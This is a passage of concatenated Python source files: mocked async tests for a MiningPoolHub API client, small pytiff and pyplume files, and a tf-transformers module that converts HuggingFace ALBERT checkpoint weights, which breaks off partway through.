async def test_get_pool_share_rate(get_pool_share_rate_response):
"""Tests an API call to get pool share rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolsharerate&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_share_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_share_rate(coin_name=ETHEREUM)
assert isinstance(result, int)
await session.close()
@pytest.mark.asyncio
async def test_get_pool_status(get_pool_status_keys, get_pool_status_response):
"""Tests an API call to get pool status"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolstatus&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_status_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_status(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_pool_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_time_since_last_block(get_time_since_last_block_response):
"""Tests an API call to get time since last block found"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gettimesincelastblock&api_key=test&page=api",
status=200,
body=json.dumps(get_time_since_last_block_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_time_since_last_block(
coin_name=ETHEREUM
)
assert isinstance(result, int)
assert result == 1153
await session.close()
@pytest.mark.asyncio
async def test_get_top_contributors(
get_top_contributors_keys, get_top_contributors_response
):
"""Tests an API call to get top contributor information"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gettopcontributors&api_key=test&page=api",
status=200,
body=json.dumps(get_top_contributors_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_top_contributors(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_top_contributors_keys).issubset(
result.keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_user_balance(get_user_balance_keys, get_user_balance_response):
"""Tests an API call to get user balance information"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_USER_BALANCES_URL,
status=200,
body=json.dumps(get_user_balance_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_user_balance_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_user_hash_rate(get_user_hash_rate_response):
"""Tests an API call to get user hash rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getuserhashrate&api_key=test&page=api",
status=200,
body=json.dumps(get_user_hash_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, float)
assert result == 200431.807
await session.close()


@pytest.mark.asyncio
async def test_get_user_share_rate(get_user_share_rate_response):
    """Tests an API call to get user share rate"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=getusersharerate&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_share_rate_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_share_rate(coin_name=ETHEREUM)
    assert isinstance(result, int)
    assert result == 0
    await session.close()


@pytest.mark.asyncio
async def test_get_user_status(get_user_status_keys, get_user_status_response):
    """Tests an API call to get user status"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=getuserstatus&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_status_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_status(coin_name=ETHEREUM)
    assert isinstance(result, dict)
    assert set(get_user_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
    assert result["shares"] is not None, "Invalid shares should not be null"
    assert result["shares"] == 1
    await session.close()


@pytest.mark.asyncio
async def test_get_user_status_null_shares(
    get_user_status_keys, get_user_status_response
):
    """Tests an API call to get user status when the API returns null shares"""
    get_user_status_response["getuserstatus"]["data"]["shares"] = None
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=getuserstatus&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_status_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_status(coin_name=ETHEREUM)
    assert isinstance(result, dict)
    assert set(get_user_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
    assert result["shares"] is not None, "Invalid shares should not be null"
    assert result["shares"] == 0
    await session.close()


@pytest.mark.asyncio
async def test_get_user_transactions(
    get_user_transactions_keys, get_user_transactions_response
):
    """Tests an API call to get user transactions"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=getusertransactions&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_transactions_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_transactions(coin_name=ETHEREUM)
    assert isinstance(result, list)
    assert isinstance(result[0], dict)
    assert set(get_user_transactions_keys).issubset(
        result[0].keys()
    ), NOT_ALL_KEYS_PRESENT
    await session.close()


@pytest.mark.asyncio
async def test_get_user_workers(get_user_workers_keys, get_user_workers_response):
    """Tests an API call to get user workers"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=getuserworkers&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_workers_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_workers(coin_name=ETHEREUM)
    assert isinstance(result, list)
    assert isinstance(result[0], dict)
    assert set(get_user_workers_keys).issubset(
        result[0].keys()
    ), NOT_ALL_KEYS_PRESENT
    await session.close()


@pytest.mark.asyncio
async def test_public(public_keys, public_response):
    """Tests an API call to get public data for a pool"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://ethereum.miningpoolhub.com/index.php?action=public&page=api",
            status=200,
            body=json.dumps(public_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_public(coin_name=ETHEREUM)
    assert isinstance(result, dict)
    assert set(public_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
    await session.close()


@pytest.mark.asyncio
async def test_get_auto_switching_and_profits_statistics(
    get_auto_switching_and_profits_statistics_keys,
    get_auto_switching_and_profits_statistics_response,
):
    """Tests an API call to get auto switching profit and statistics"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            GET_AUTO_SWITCHING_URL,
            status=200,
            body=json.dumps(get_auto_switching_and_profits_statistics_response),
            headers=CONTENT_HEADERS,
        )
        result = (
            await miningpoolhubapi.async_get_auto_switching_and_profits_statistics()
        )
    assert isinstance(result, list)
    assert isinstance(result[0], dict)
    assert set(get_auto_switching_and_profits_statistics_keys).issubset(
        result[0].keys()
    ), NOT_ALL_KEYS_PRESENT
    await session.close()


@pytest.mark.asyncio
async def test_get_auto_switching_and_profits_statistics_fail(
    get_auto_switching_and_profits_statistics_response_fail,
):
    """Tests an API call to get auto switching profit and statistics that failed"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            GET_AUTO_SWITCHING_URL,
            status=200,
            body=json.dumps(get_auto_switching_and_profits_statistics_response_fail),
            headers=CONTENT_HEADERS,
        )
        with pytest.raises(APIError):
            await miningpoolhubapi.async_get_auto_switching_and_profits_statistics()
    await session.close()


@pytest.mark.asyncio
async def test_get_mining_profit_and_statistics(
    get_mining_profit_and_statistics_keys,
    get_mining_and_profit_statistics_response,
):
    """Tests an API call to get mining profit and statistics"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    with aioresponses() as m:
        m.get(
            "https://miningpoolhub.com/index.php?action=getminingandprofitsstatistics&page=api",
            status=200,
            body=json.dumps(get_mining_and_profit_statistics_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_mining_profit_and_statistics()
    assert isinstance(result, list)
    assert isinstance(result[0], dict)
    assert set(get_mining_profit_and_statistics_keys).issubset(
        result[0].keys()
    ), NOT_ALL_KEYS_PRESENT
    await session.close()


@pytest.mark.asyncio
async def test_get_mining_profit_and_statistics_fail(
    get_mining_and_profit_statistics_response_fail,
):
    """Tests an API call to get mining profit and statistics that failed"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    with aioresponses() as m:
        m.get(
            "https://miningpoolhub.com/index.php?action=getminingandprofitsstatistics&page=api",
            status=200,
            body=json.dumps(get_mining_and_profit_statistics_response_fail),
            headers=CONTENT_HEADERS,
        )
        with pytest.raises(APIError):
            await miningpoolhubapi.async_get_mining_profit_and_statistics()
    await session.close()


@pytest.mark.asyncio
async def test_get_user_all_balances(
    get_user_all_balances_keys, get_user_all_balances_response
):
    """Tests an API call to get all of the user's balances"""
    session = aiohttp.ClientSession()
    miningpoolhubapi = MiningPoolHubAPI(session=session)
    assert miningpoolhubapi.api_key_set() is True
    with aioresponses() as m:
        m.get(
            "https://miningpoolhub.com/index.php?action=getuserallbalances&api_key=test&page=api",
            status=200,
            body=json.dumps(get_user_all_balances_response),
            headers=CONTENT_HEADERS,
        )
        result = await miningpoolhubapi.async_get_user_all_balances()
    assert isinstance(result, list)
    assert isinstance(result[0], dict)
    assert set(get_user_all_balances_keys).issubset(
        result[0].keys()
    ), NOT_ALL_KEYS_PRESENT
    await session.close()


# File: pytiff/test/test_utils.py (repo: ch-schiffer/pytiff)

from pytiff import byteorder, is_bigtiff


def test_byteorder():
    assert byteorder("test_data/small_example.tif") == "<"
    assert byteorder("test_data/big_endian_small_example.tif") == ">"


def test_is_bigtiff():
    assert not is_bigtiff("test_data/small_example.tif")
    assert is_bigtiff("test_data/bigtif_example.tif")


# File: pyplume/__init__.py (repo: awa1k3r/plume-generation-and-analysis)

from . import mech
from . import model
from . import figures
from . import output
from . import statistics


# File: src/tf_transformers/models/albert/convert.py (repo: legacyai/tf-transformers)

# coding=utf-8
# Copyright 2021 TF-Transformers Authors and The TensorFlow Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import tensorflow as tf
from absl import logging
from tf_transformers.core import keras_utils


def assert_model_results(model):
    def get_expected_text(model_name):
        if model_name == "bert_base_uncased":
            expected_text = ". i want to buy the car because it is cheap.."
        if model_name == "bert_base_cased" or model_name == "bert_large_cased":
            expected_text = ".. want to buy the car because it is cheap.."
        if model_name == "bert_large_cased":
            expected_text = ".. want to buy the car because it is cheap.."
        return expected_text

    def assert_bert(model_name):
        from transformers import BertTokenizer

        model_name = model_name.replace("_", "-")
        tokenizer = BertTokenizer.from_pretrained(model_name)
        text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
        input_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(text))
        input_ids = tf.constant([input_ids])

        inputs = {}
        inputs["input_ids"] = input_ids
        inputs["input_mask"] = tf.ones_like(input_ids)
        inputs["input_type_ids"] = tf.zeros_like(input_ids)
        results = model(inputs)
        expected_text = get_expected_text(model_name)
        decoded_text = tokenizer.decode(tf.argmax(results["token_logits"], axis=2)[0].numpy())
        assert expected_text == decoded_text

    def assert_model(model_name):
        assert_bert(model_name)

    return assert_model


def convert_albert_pt(model, config, model_name):
    """Convert a HuggingFace PyTorch ALBERT checkpoint into a tf_transformers model.

    Args:
        model: tf_transformers model/layer
        config: dict
        model_name: HuggingFace model name
    Returns:
        None (weights are assigned in place)
    """
    # When dropout, use_auto_regressive is enabled assertion won't work
    SKIP_ASSERT = False
    try:
        # LegacyLayer
        local_config = model._config_dict
    except Exception:
        # LegacyModel
        local_config = model.model_config

    if local_config['use_dropout']:
        logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
        SKIP_ASSERT = True
    if local_config['use_auto_regressive']:
        raise ValueError(
            "Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
        )

    import torch
    import transformers

    transformers.logging.set_verbosity_error()

    from_model_vars = [
        "embeddings.word_embeddings.weight",
        "embeddings.token_type_embeddings.weight",
        "embeddings.position_embeddings.weight",
        "embeddings.LayerNorm.weight",
        "embeddings.LayerNorm.bias",
        "encoder.embedding_hidden_mapping_in.weight",
        "encoder.embedding_hidden_mapping_in.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.query.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.query.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.key.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.key.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.value.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.value.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.dense.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.dense.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.LayerNorm.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.attention.LayerNorm.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.ffn.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.ffn.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.ffn_output.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.ffn_output.bias",
        "encoder.albert_layer_groups.0.albert_layers.0.full_layer_layer_norm.weight",
        "encoder.albert_layer_groups.0.albert_layers.0.full_layer_layer_norm.bias",
        "pooler.weight",
        "pooler.bias",
    ]

    # To vars (Transformer variables)
    to_model_vars = [
        "tf_transformers/albert/word_embeddings/embeddings:0",
        "tf_transformers/albert/type_embeddings/embeddings:0",
        "tf_transformers/albert/positional_embeddings/embeddings:0",
        "tf_transformers/albert/embeddings/layer_norm/gamma:0",
        "tf_transformers/albert/embeddings/layer_norm/beta:0",
        "tf_transformers/albert/embedding_projection/kernel:0",
        "tf_transformers/albert/embedding_projection/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/query/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/query/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/key/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/key/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/value/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/value/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention_output/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention_output/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention_layer_norm/gamma:0",
        "tf_transformers/albert/transformer/layer/self_attention_layer_norm/beta:0",
        "tf_transformers/albert/transformer/layer/intermediate/kernel:0",
        "tf_transformers/albert/transformer/layer/intermediate/bias:0",
        "tf_transformers/albert/transformer/layer/output/kernel:0",
        "tf_transformers/albert/transformer/layer/output/bias:0",
        "tf_transformers/albert/transformer/layer/output_layer_norm/gamma:0",
        "tf_transformers/albert/transformer/layer/output_layer_norm/beta:0",
        "tf_transformers/albert/pooler_transform/kernel:0",
        "tf_transformers/albert/pooler_transform/bias:0",
    ]

    # Simple Assertion
    assert len(from_model_vars) == len(to_model_vars)
    mapping_dict = {}
    for index in range(len(from_model_vars)):
        for i in range(config["num_hidden_layers"]):
            mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)

    # AlbertModel
    from transformers import AlbertModel

    model_hf = AlbertModel.from_pretrained(model_name)
    # HF model variable name to variable values, for fast retrieval
    from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}

    tf_transformers_model_index_dict = {}
    for index, var in enumerate(model.variables):
        tf_transformers_model_index_dict[var.name] = index
        # In auto_regressive mode, positional embeddings variable name has
        # cond extra name. So, in case someone converts in that mode,
        # replace above mapping here, only for positional embeddings
        if var.name == "tf_transformers/albert/cond/positional_embeddings/embeddings:0":
            mapping_dict[
                "embeddings.position_embeddings.weight"
            ] = "tf_transformers/albert/cond/positional_embeddings/embeddings:0"

    # legacy_ai <-- HuggingFace
    assigned_map = []
    # assigned_map_values = []
    for original_var, legacy_var in mapping_dict.items():
        index = tf_transformers_model_index_dict[legacy_var]
        if "embedding_projection/kernel:0" in legacy_var:
            model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
            continue

        if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
            # huggingface (2D) to tf_transformers (3D)
            model.variables[index].assign(
                np.reshape(
                    np.transpose(from_to_variable_dict.get(original_var)),
                    (
                        config["embedding_projection_size"],
                        config["num_attention_heads"],
                        config["attention_head_size"],
                    ),
                )
            )
            assigned_map.append((original_var, legacy_var))
            # assigned_map_values.append\
            # ((tf.reduce_sum(from_to_variable_dict.get(original_var)).numpy(), \
            # tf.reduce_sum(model.variables[index]).numpy()))
            continue

        if "query/bias:0" in legacy_var or "key/bias:0" in legacy_var or "value/bias:0" in legacy_var:
            # huggingface (2D) to tf_transformers (3D)
            model.variables[index].assign(
                np.reshape(
                    from_to_variable_dict.get(original_var),
                    (
                        config["num_attention_heads"],
                        config["attention_head_size"],
                    ),
                )
            )
            assigned_map.append((original_var, legacy_var))
            # assigned_map_values.append((tf.reduce_sum(\
            # from_to_variable_dict.get(original_var)).numpy(),\
            # tf.reduce_sum(model.variables[index]).numpy()))
            continue

        if "self_attention_output/kernel:0" in legacy_var:
            # huggingface (3D) to tf_transformers (2D)
            model.variables[index].assign(
                np.reshape(
                    np.transpose(from_to_variable_dict.get(original_var)),
                    (
                        config["embedding_projection_size"],
                        config["num_attention_heads"] * config["attention_head_size"],
                    ),
                )
            )
            assigned_map.append((original_var, legacy_var))
            continue

        if "self_attention_output/bias:0" in legacy_var:
            # huggingface (3D) to tf_transformers (2D)
            model.variables[index].assign(
                np.reshape(
                    from_to_variable_dict.get(original_var),
                    (-1),
                )
            )
            assigned_map.append((original_var, legacy_var))
            continue

        if (
            "intermediate/kernel:0" in legacy_var
            or "output/kernel:0" in legacy_var
            or 'pooler_transform/kernel:0' in legacy_var
        ):
            # huggingface stores torch Linear kernels transposed
            model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
            assigned_map.append((original_var, legacy_var))
            continue

        model.variables[index].assign(from_to_variable_dict.get(original_var))
        assigned_map.append((original_var, legacy_var))

    if SKIP_ASSERT is False:
        from transformers import AlbertTokenizer

        tokenizer = AlbertTokenizer.from_pretrained(model_name)
        text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
        inputs = tokenizer(text, return_tensors="pt")
        outputs_pt = model_hf(**inputs)
        outputs_pt = torch.argmax(outputs_pt.last_hidden_state, dim=2)[0].numpy()

    # AlbertMLM
    from transformers import AlbertForMaskedLM

    model_hf = AlbertForMaskedLM.from_pretrained(model_name)

    hf_vars = [
        "predictions.bias",
        "predictions.dense.weight",
        "predictions.dense.bias",
        "predictions.LayerNorm.weight",
        "predictions.LayerNorm.bias",
    ]
    tf_vars = [
        "tf_transformers/albert/logits_bias/bias:0",
        "tf_transformers/albert/mlm/transform/dense/kernel:0",
        "tf_transformers/albert/mlm/transform/dense/bias:0",
        "tf_transformers/albert/mlm/transform/LayerNorm/gamma:0",
        "tf_transformers/albert/mlm/transform/LayerNorm/beta:0",
    ]
    mapping_dict = dict(zip(tf_vars, hf_vars))
    # HF model variable name to variable values, for fast retrieval
    hf_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters() if name in hf_vars}
    for var in model.variables:
        if var.name in tf_vars:
            hf_var_name = mapping_dict[var.name]
            if "dense/kernel:0" in var.name:
                var.assign(np.transpose(hf_variable_dict[hf_var_name]))
                continue
            var.assign(hf_variable_dict[hf_var_name])

    if SKIP_ASSERT is False:
        inputs = tokenizer(text, return_tensors="pt")
        outputs_pt_mlm = model_hf(**inputs)
        text_pt = tokenizer.decode(torch.argmax(outputs_pt_mlm[0], dim=2)[0])
        del model_hf

        inputs = tokenizer(text, return_tensors="tf")
        inputs_tf = {}
        inputs_tf["input_ids"] = inputs["input_ids"]
        inputs_tf["input_type_ids"] = inputs["token_type_ids"]
        inputs_tf["input_mask"] = inputs["attention_mask"]
        outputs_tf = model(inputs_tf)
        text_tf = tokenizer.decode(tf.argmax(outputs_tf["token_logits"], axis=2)[0])
        assert text_pt == text_tf
        outputs_tf = tf.argmax(outputs_tf["token_embeddings"], axis=2)[0].numpy()
        tf.debugging.assert_equal(outputs_pt, outputs_tf)


def convert_albert_tf(model, config, model_name):
    """Convert a HuggingFace TF ALBERT checkpoint into a tf_transformers model.

    Args:
        model: tf_transformers model/layer
        config: dict
        model_name: HuggingFace model name
    Returns:
        None (weights are assigned in place)
    """
    # When dropout, use_auto_regressive is enabled assertion won't work
    SKIP_ASSERT = False
    try:
        # LegacyLayer
        local_config = model._config_dict
    except Exception:
        # LegacyModel
        local_config = model.model_config

    if local_config['use_dropout']:
        logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
        SKIP_ASSERT = True
    if local_config['use_auto_regressive']:
        raise ValueError(
            "Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
        )

    import transformers

    transformers.logging.set_verbosity_error()

    # From vars (Transformer variables)
    from_model_vars = [
        "tf_albert_model/albert/embeddings/word_embeddings/weight:0",
        "tf_albert_model/albert/embeddings/token_type_embeddings/embeddings:0",
        "tf_albert_model/albert/embeddings/position_embeddings/embeddings:0",
        "tf_albert_model/albert/embeddings/LayerNorm/gamma:0",
        "tf_albert_model/albert/embeddings/LayerNorm/beta:0",
        "tf_albert_model/albert/encoder/embedding_hidden_mapping_in/kernel:0",
        "tf_albert_model/albert/encoder/embedding_hidden_mapping_in/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/query/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/query/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/key/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/key/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/value/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/value/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/dense/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/dense/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/LayerNorm/gamma:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/LayerNorm/beta:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn_output/kernel:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn_output/bias:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/full_layer_layer_norm/gamma:0",
        "tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/full_layer_layer_norm/beta:0",
        "tf_albert_model/albert/pooler/kernel:0",
        "tf_albert_model/albert/pooler/bias:0",
    ]

    # To vars (Transformer variables)
    to_model_vars = [
        "tf_transformers/albert/word_embeddings/embeddings:0",
        "tf_transformers/albert/type_embeddings/embeddings:0",
        "tf_transformers/albert/positional_embeddings/embeddings:0",
        "tf_transformers/albert/embeddings/layer_norm/gamma:0",
        "tf_transformers/albert/embeddings/layer_norm/beta:0",
        "tf_transformers/albert/embedding_projection/kernel:0",
        "tf_transformers/albert/embedding_projection/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/query/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/query/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/key/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/key/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention/value/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention/value/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention_output/kernel:0",
        "tf_transformers/albert/transformer/layer/self_attention_output/bias:0",
        "tf_transformers/albert/transformer/layer/self_attention_layer_norm/gamma:0",
        "tf_transformers/albert/transformer/layer/self_attention_layer_norm/beta:0",
        "tf_transformers/albert/transformer/layer/intermediate/kernel:0",
        "tf_transformers/albert/transformer/layer/intermediate/bias:0",
        "tf_transformers/albert/transformer/layer/output/kernel:0",
        "tf_transformers/albert/transformer/layer/output/bias:0",
        "tf_transformers/albert/transformer/layer/output_layer_norm/gamma:0",
        "tf_transformers/albert/transformer/layer/output_layer_norm/beta:0",
        "tf_transformers/albert/pooler_transform/kernel:0",
        "tf_transformers/albert/pooler_transform/bias:0",
    ]

    # Simple Assertion
    assert len(from_model_vars) == len(to_model_vars)
    mapping_dict = {}
    for index in range(len(from_model_vars)):
        for i in range(config["num_hidden_layers"]):
            mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)

    # TFAlbertModel
    from transformers import TFAlbertModel

    model_hf = TFAlbertModel.from_pretrained(model_name)
    from_to_variable_dict = {var.name: var for var in model_hf.variables}

    tf_transformers_model_index_dict = {}
    for index, var in enumerate(model.variables):
        tf_transformers_model_index_dict[var.name] = index
        # In auto_regressive mode, positional embeddings variable name has
        # cond extra name. So, in case someone converts in that mode,
        # replace above mapping here, only for positional embeddings
        if var.name == "tf_transformers/albert/cond/positional_embeddings/embeddings:0":
            mapping_dict[
                "tf_albert_model/albert/embeddings/position_embeddings/embeddings:0"
            ] = "tf_transformers/albert/cond/positional_embeddings/embeddings:0"

    # legacy_ai <-- HuggingFace
    assigned_map = []
    # assigned_map_values = []
    for original_var, legacy_var in mapping_dict.items():
        index = tf_transformers_model_index_dict[legacy_var]
        if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
            # huggingface (2D) to tf_transformers (3D)
            model.variables[index].assign(
                tf.reshape(
                    from_to_variable_dict.get(original_var),
                    (
                        config["embedding_projection_size"],
                        config["num_attention_heads"],
                        config["attention_head_size"],
                    ),
                )
            )
            assigned_map.append((original_var, legacy_var))
            # assigned_map_values.append\
            # ((tf.reduce_sum(from_to_variable_dict.get(original_var)).numpy(), \
            # tf.reduce_sum(model.variables[index]).numpy()))
            continue

        if "query/bias:0" in legacy_var or "key/bias:0" in legacy_var or "value/bias:0" in legacy_var:
            # huggingface (2D) to tf_transformers (3D)
            model.variables[index].assign(
                tf.reshape(
                    from_to_variable_dict.get(original_var),
                    (
                        config["num_attention_heads"],
                        config["attention_head_size"],
                    ),
                )
            )
            assigned_map.append((original_var, legacy_var))
            # assigned_map_values.append((tf.reduce_sum(\
            # from_to_variable_dict.get(original_var)).numpy(),\
            # tf.reduce_sum(model.variables[index]).numpy()))
            continue

        model.variables[index].assign(from_to_variable_dict.get(original_var))
        assigned_map.append((original_var, legacy_var))

    if SKIP_ASSERT is False:
        from transformers import AlbertTokenizer

        tokenizer = AlbertTokenizer.from_pretrained(model_name)
        text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
        inputs = tokenizer(text, return_tensors="tf")
        outputs_hf = model_hf(**inputs)
        outputs_hf = tf.argmax(outputs_hf.last_hidden_state, axis=2)[0].numpy()

    # AlbertMLM
    from transformers import TFAlbertForMaskedLM

    model_hf = TFAlbertForMaskedLM.from_pretrained(model_name)

    hf_vars = [
        "tf_albert_for_masked_lm/predictions/bias:0",
        "tf_albert_for_masked_lm/predictions/dense/kernel:0",
